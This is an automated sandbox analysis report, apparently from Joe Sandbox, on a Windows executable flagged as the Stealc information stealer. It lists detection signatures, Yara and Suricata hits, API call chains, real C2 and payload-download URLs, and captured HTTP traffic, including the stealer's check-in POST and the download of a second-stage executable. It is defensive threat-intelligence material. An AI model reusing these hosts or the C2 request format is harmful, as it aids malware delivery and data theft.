
Windows Analysis Report
jicQJ2cdlM.exe

Overview

General Information

Sample name: jicQJ2cdlM.exe (renamed because the original name is a hash value)
Original sample name: c26c0c92ef5ad707c6f9dd37b2c016ae.exe
Analysis ID: 1542867
MD5: c26c0c92ef5ad707c6f9dd37b2c016ae
SHA1: 7269e1394aeb4bb014babee479e7a520a7bfe6d0
SHA256: 9cebd9110296bdd93cb0d23ed1a591d097a49f3827b364daf44615885dbdcff7
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • jicQJ2cdlM.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\jicQJ2cdlM.exe" MD5: C26C0C92EF5AD707C6F9DD37B2C016AE)
    • A8A9.tmp.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe" MD5: 085DE763171FBBAFEAC2CDB972AACC2A)
      • WerFault.exe (PID: 7576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 1132 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000001.00000003.1833028905.0000000002D60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1220:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Source | Rule | Description | Author | Strings
1.3.A8A9.tmp.exe.2d60000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
1.2.A8A9.tmp.exe.2d10e67.3.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
1.2.A8A9.tmp.exe.400000.1.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
1.3.A8A9.tmp.exe.2d60000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
1.2.A8A9.tmp.exe.400000.1.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-26T18:58:28.019793+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 62.204.41.177 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-26T18:58:18.093755+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 104.21.56.70 | 443 | TCP
2024-10-26T18:58:19.631888+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 176.113.115.37 | 80 | TCP

AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: 00000001.00000003.1833028905.0000000002D60000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | ReversingLabs: Detection: 34%
Source: jicQJ2cdlM.exe | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Joe Sandbox ML: detected
Source: jicQJ2cdlM.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D1CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D174A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D19DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D29107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D19D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree

Compliance

Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Unpacked PE file: 0.2.jicQJ2cdlM.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Unpacked PE file: 1.2.A8A9.tmp.exe.400000.1.unpack
Source: jicQJ2cdlM.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D1E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D247D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D1EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D24B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D23B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D1C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D1DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D1E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D1F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D24107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D11937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 62.204.41.177:80
Source: Malware configuration extractor | URLs: http://62.204.41.177/edd20096ecef326d.php
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Sat, 26 Oct 2024 16:58:19 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Sat, 26 Oct 2024 16:45:02 GMT
    ETag: "62400-62563f4f86bc9"
    Accept-Ranges: bytes
    Content-Length: 402432
    Content-Type: application/x-msdos-program
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 62.204.41.177
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /edd20096ecef326d.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIEC
    Host: 62.204.41.177
    Content-Length: 219
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------KJEHJKJEBGHJJKEBGIEC
    Content-Disposition: form-data; name="hwid"

    985EFFAB68083674480464
    ------KJEHJKJEBGHJJKEBGIEC
    Content-Disposition: form-data; name="build"

    default9_cap
    ------KJEHJKJEBGHJJKEBGIEC--
Source: Joe Sandbox View | IP Address: 176.113.115.37
Source: Joe Sandbox View | IP Address: 62.204.41.177
Source: Joe Sandbox View | IP Address: 104.21.56.70
Source: Joe Sandbox View | ASN Name: TNNET-ASTNNetOyMainnetworkFI
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.37:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 104.21.56.70:443
Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00402A14 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected:
    GET /track_prt.php?sub=0&cc=DE HTTP/1.1
    User-Agent: ShareScreen
    Host: post-to-me.com
Source: global traffic | HTTP traffic detected:
    GET /ScreenUpdateSync.exe HTTP/1.1
    User-Agent: ShareScreen
    Host: 176.113.115.37
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 62.204.41.177
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: post-to-me.com
Source: unknown | HTTP traffic detected:
    POST /edd20096ecef326d.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIEC
    Host: 62.204.41.177
    Content-Length: 219
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------KJEHJKJEBGHJJKEBGIEC
    Content-Disposition: form-data; name="hwid"

    985EFFAB68083674480464
    ------KJEHJKJEBGHJJKEBGIEC
    Content-Disposition: form-data; name="build"

    default9_cap
    ------KJEHJKJEBGHJJKEBGIEC--
Source: jicQJ2cdlM.exe, jicQJ2cdlM.exe, 00000000.00000003.4048046249.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174714149.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.4048093961.000000000086F000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.000000000086F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
Source: jicQJ2cdlM.exe, 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE
Source: jicQJ2cdlM.exe, 00000000.00000003.4048046249.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174714149.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeP
Source: jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exea
Source: jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exek4
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, A8A9.tmp.exe, 00000001.00000002.2054458680.0000000002DFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/$c
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/K
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.php6
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpGc:
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpIc
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpJ
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpL
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpb
Source: A8A9.tmp.exe, 00000001.00000002.2054458680.0000000002DFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177S
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/
Source: jicQJ2cdlM.exe | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: jicQJ2cdlM.exe, 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                    Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DET
                    Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/v
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009E1947 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_009E1947
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3

                    System Summary

                    Source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000001.00000002.2054499794.0000000002E09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_009E237D NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_009E2621 NtdllDefWindowProc_W,PostQuitMessage
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00428042
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_004071D0
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_004373F9
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_004274A4
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_0042D50E
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00428580
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_004166CF
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00413745
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00427816
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_0040E999
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00427AC0
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00418ACF
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_0042EB00
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00436CDF
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00427D87
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00413F2B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_007F91A4
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_009F4192
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A0ED67
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A082A9
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A087E7
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A0770B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A0D775
